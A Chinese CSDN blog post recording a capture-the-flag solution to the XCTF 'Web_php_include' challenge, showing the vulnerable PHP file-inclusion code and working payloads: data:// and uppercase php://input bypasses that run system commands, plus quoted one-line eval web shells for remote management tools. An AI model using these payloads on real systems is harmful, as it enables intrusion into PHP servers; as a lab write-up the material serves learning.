CTF题目记录5

最新推荐文章于 2024-04-23 20:51:39 发布
最新推荐文章于 2024-04-23 20:51:39 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: CTF题目记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39679772/article/details/106292046
版权

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);//此处为文件包含,执行page中的内容
?>

考察基础的文件包含,过滤了php://
page变量可以操控

思路:先找flag文件的位置,再查看flag文件的内容

  • strstr()函数:大小写不敏感,所以要想使用php协议,要改成大写

  • cat命令

cat命令的用途是连接文件或标准输入并打印。这个命令常用来显示文件内容,或者将几个文件连接起来显示,或者从标准输入读取内容并显示,它常与重定向符号配合使用。

1.命令格式:

cat [选项] [文件]…

2.命令功能:

cat主要有三大功能:

1.一次显示整个文件:cat filename

2.从键盘创建一个文件:cat > filename 只能创建新文件,不能编辑已有文件.

3.将几个文件合并为一个文件:cat file1 file2 > file

  • ls命令/dir 列出文件

方法1:使用data://协议

http://124.126.19.106:56038/?page=data://text/plain,<?php system("ls")?>
在这里插入图片描述

方法2:使用php://input协议 大写绕过
php://input 协议主要用来接收post数据,将post请求中的数据作为php代码执行

此处ps:我本准备用hackbar post数据 但是页面一闪而过了,所以还是得用bp啊…
在这里插入图片描述
结果都是一样的

然后我们要读取文件的内容,执行 cat 命令
http://124.126.19.106:56038/?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
然后查看源代码(根据评论,php文件一般在源代码中)

也可以利用hello变量的:传参hello=<?show_source('fl4gisisish3r3.php');?>

show_source() 函数对文件进行语法高亮显示。

本函数是 highlight_file() 的别名
在这里插入图片描述
还有其它解法:摘自攻防世界的评论区

评1:菜刀直连 http://111.198.29.45:46279/index.php?page=data:%20text/plain,<?php%20eval(@$_POST['c'])%20?>

评2:这题我占时了解3中方法。第一种利用 PHP://input post: <?php system("ls");?> 查看到fla…g.php;第二种:http://111.198.29.45:40787/index.php?page=data:text/plain,<?php system("ls"); ?>;第三中:http://111.198.29.45:40787/index.php?page=data:text/plain,<?php eval($_POST[c]); ?> 蚁剑连接:url里面之间输入前面的,密码是c
还有一种into outfile 但是不行 ,因为权限不够 用chmod 777 /var/www/赋权限不行,所以放弃

php_rce

这题是蒙蔽的,因为啥都不知道QAQ
搜了一下是thinkphp 5.x rce漏洞 等我学习一下再来做

kkzz1x
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【XCTF-Mobile】新手练习区-11-你是谁.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5096&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/who_r_u
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
ISCC2021 美人计
最新发布
sky_original的博客
04-23 286
打开zip,在ny4w1nbmry4m\word\media这个路径下找到两张二维码。得到密钥:ISCC2021 了解到加密方式有AES。使用QR Research分别扫描得到以下两段码。得知第一段是DES加密,解码后得到flag。PK开头说明被强制转换过,原来是zip。有一个文档和黑寡妇图片。第二段是AES加密,连续三次解码后得到。用010 Editor打开黑寡妇图片。之后用010 Editor打开文档。说明美人的话不可全信啊。注意:不可换行提交!
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 4496
CTF之路:关于PHP eval() 注入问题
ctfshow-php特性
YkingH的博客
01-26 5741
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
XCTF-攻防世界CTF平台-Web类——4、Web_php_include(php中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 2898
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
PHP命令执行集锦
蚁景网安学院
03-21 2328
代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下...
文件包含漏洞总结
金色%夕阳的博客
08-19 1080
文件包含漏洞总结 CTF中文件包含漏洞 0x01 什么是文件包含漏洞 0X02 文件包含漏洞的环境要求 0X03 常见文件包含函数 0X04 PHP伪协议 1、PHP://INPUT 2、PHP://FILTER 3、ZIP:// 4、DATA://与PHAR:// 0x05 包含APACHE日志文件 0x0
ISCC 2022 部分
BvxiE的博客
06-10 1264
这里写自定义目录标题 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is_numeric(@$info["year"])?die("Sorry~"):NULL; if(@$info["year"]){ ($inf
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
攻防世界web做题笔记
weixin_64286326的博客
02-08 579
想着早点把任务完成,结果动态环境一直创建失败,麻了 加群反馈了,还是没有回复,先注册个小号得了 md 换个号还是这样,谢特
show_source() 函数
冷月醉雪的博客
03-29 2988
查看更多 https://www.yuque.com/docs/share/0690a545-49d8-4a2e-960d-9ba76b68dba0
云尘 命令执行系列
m0_75178803的博客
11-07 390
这意味着用户可以通过POST请求的 "cmd" 参数注入并执行他们想要的PHP代码。同时要注意的是 null 字符("\0")并不等同于 PHP 的 NULL 常量。我们用cmd执行system命令中的读取flag命令,得到flag。(注意,如,system("color f4"),命令是放在一对。函数它允许执行任意的PHP代码字符串。//这个条件检查是否存在名为 "cmd" 的POST请求参数。//如果 "cmd" 参数存在,它的值被赋给了变量。的参数,然后将该参数的值传递给系统命令执行函数。
攻防世界web进阶区刷题记录(1)
bmth666的博客
03-27 4581
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
ctf刷题小结
quan9i的博客
05-15 6066
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
攻防世界-web-Web_php_include(文件包含与伪协议)
2301_77300311的博客
05-04 557
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
[省信息安全技术大赛]Web4
qq_45691294的博客
10-26 708
打开题目,直接得到了源码  <?php show_source(__FILE__); function getKey($path){ $name = $path.md5($_SERVER["REMOTE_ADDR"]).'.php'; return $name; } echo $_SERVER["REMOTE_ADDR"]; $expire = $_POST['expire']; $path = $_POST['pa
ctf题目及flag打包下载
07-25
### 回答1: “CTF题目及Flag打包下载”是一个提供CTF比赛题目和相应的Flag(答案)的下载服务。在CTF比赛中,参赛者通过解决各种具有挑战性的安全题目来提升其网络安全攻防能力。 这个服务的目的是为了方便CTF比赛的参赛者获取比赛所需的题目和Flag。一般而言,CTF比赛会有多个题目,每个题目都具有不同的主题和难度。参赛者需要通过分析和利用题目中的漏洞、密码学算法等来获取Flag。Flag通常以特定格式的字符串给出,表示对相关题目的正确解答。 CTF题目及Flag打包下载服务一般会提供一个文件包,里面包含了所有比赛题目的相关文件和Flag。这些文件可能是二进制文件、源代码、加密文件、网络流量等。参赛者可以下载这个文件包后,解压并独立研究每个题目,尝试找到Flag。 通过提供CTF题目及Flag打包下载,可以帮助参赛者更便捷地获取比赛所需的题目和答案。参赛者可以在自己的计算机上独立进行攻击与防守的实践,提高他们的技能和经验。这种服务也有助于促进CTF比赛的发展和推广,吸引更多对网络安全感兴趣的人参与进来。 ### 回答2: CTF比赛是一种网络安全竞赛,参与者需要解决各种安全相关的问题来获取特定的“flag”。Flag是一种明确标识符,通常是一串特定的字符或字符串,用于证明成功解决了问题或完成了相应任务。 在CTF比赛中,以题目和flag的形式呈现问题是非常常见的。一般来说,比赛主办方会给出一系列的题目,每个题目都有一个flag作为解决问题的目标。参与者需要通过分析、加密解密、漏洞利用等技术手段来获取flag。 当比赛结束后,主办方会提供一个打包下载的链接,参与者可以通过该链接将所有的题目和相关的flag一次性下载到自己的设备中。这样,参与者就可以在比赛结束后回顾、学习、研究和分享解题的经验和思路。 对于参与者来说,下载题目和flag的打包是非常重要的,因为它可以帮助他们更好地理解并学习到比赛中遇到的各种问题和解决方案。同时,这些题目和flag的打包下载也提供了参赛者继续研究和深入学习网络安全技术的机会。 总之,CTF比赛中的题目及flag的打包下载对于参与者来说是非常有价值的。它们不仅是学习和研究的资料,还可以帮助参赛者提高自己的技术水平和安全意识。因此,比赛主办方提供题目和flag的打包下载是为了方便参与者继续学习和进一步探索网络安全领域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值